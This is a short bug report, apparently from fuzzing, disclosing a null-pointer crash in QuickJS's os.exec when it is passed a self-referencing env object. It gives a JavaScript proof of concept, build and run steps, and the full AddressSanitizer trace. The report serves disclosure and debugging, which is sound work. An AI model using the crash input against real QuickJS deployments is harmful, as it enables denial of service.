SEGV in js_os_exec with Circular env Object

[7331akasokoan]

POC:

import * as os from "os";
const v0 = {};
v0.self = v0;
v0.toString = function() { return JSON.stringify(this.self); };
try {
    os.exec(["echo", "test"], { env: v0, block: true });
} catch(v1) {}

Step:

1. Build QuickJS with ASAN
2. ./qjs --std ./poc.js

Crash:

=================================================================
==3218115==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x557960c095b6 bp 0x7ffc77b27810 sp 0x7ffc77b27700 T0)
==3218115==The signal is caused by a READ memory access.
==3218115==Hint: address points to the zero page.
    #0 0x557960c095b6 in js_os_exec /home/fuzz/quickjs/quickjs-libc.c:3315:16
    #1 0x5579609fb150 in js_call_c_function /home/fuzz/quickjs/quickjs.c:17250:19
    #2 0x557960a2f079 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17445:16
    #3 0x557960a323e1 in JS_CallInternal /home/fuzz/quickjs/quickjs.c:17849:27
    #4 0x557960abb4c1 in async_func_resume /home/fuzz/quickjs/quickjs.c:20391:15
    #5 0x557960b043f3 in js_async_function_resume /home/fuzz/quickjs/quickjs.c:20670:16
    #6 0x557960a686aa in js_async_function_call /home/fuzz/quickjs/quickjs.c:20764:5
    #7 0x557960ac2dce in js_execute_sync_module /home/fuzz/quickjs/quickjs.c:30822:19
    #8 0x557960ac21b9 in js_inner_module_evaluation /home/fuzz/quickjs/quickjs.c:30931:13
    #9 0x557960a52c5d in js_evaluate_module /home/fuzz/quickjs/quickjs.c:30981:9
    #10 0x557960a52c5d in JS_EvalFunctionInternal /home/fuzz/quickjs/quickjs.c:36588:19
    #11 0x557960a526e3 in JS_EvalFunction /home/fuzz/quickjs/quickjs.c:36602:12
    #12 0x5579609f8e65 in eval_buf /home/fuzz/quickjs/qjs.c:62:19
    #13 0x5579609f8597 in eval_file /home/fuzz/quickjs/qjs.c:101:11
    #14 0x5579609f8597 in main /home/fuzz/quickjs/qjs.c:519:17
    #15 0x7fbc75f8ad8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #16 0x7fbc75f8ae3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #17 0x557960910714 in _start (/home/fuzz/quickjs/qjs+0x59714)
==3218115==Register values:
rax = 0x0000000000000000  rbx = 0x00007ffc77b27700  rcx = 0x00007bec753e9900  rdx = 0x00000000000001e5
rdi = 0x0000000000000000  rsi = 0x00007fbc75bbb0d8  rbp = 0x00007ffc77b27810  rsp = 0x00007ffc77b27700
 r8 = 0x0000000000000018   r9 = 0x00007dfc753e0000  r10 = 0x00007fffffffff01  r11 = 0xaec7400a48dbea01
r12 = 0x00007bbc74225880  r13 = 0x0000000000000000  r14 = 0x00000f778e844b10  r15 = 0x00007bbc74225880
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/fuzz/quickjs/quickjs-libc.c:3315:16 in js_os_exec
==3218115==ABORTING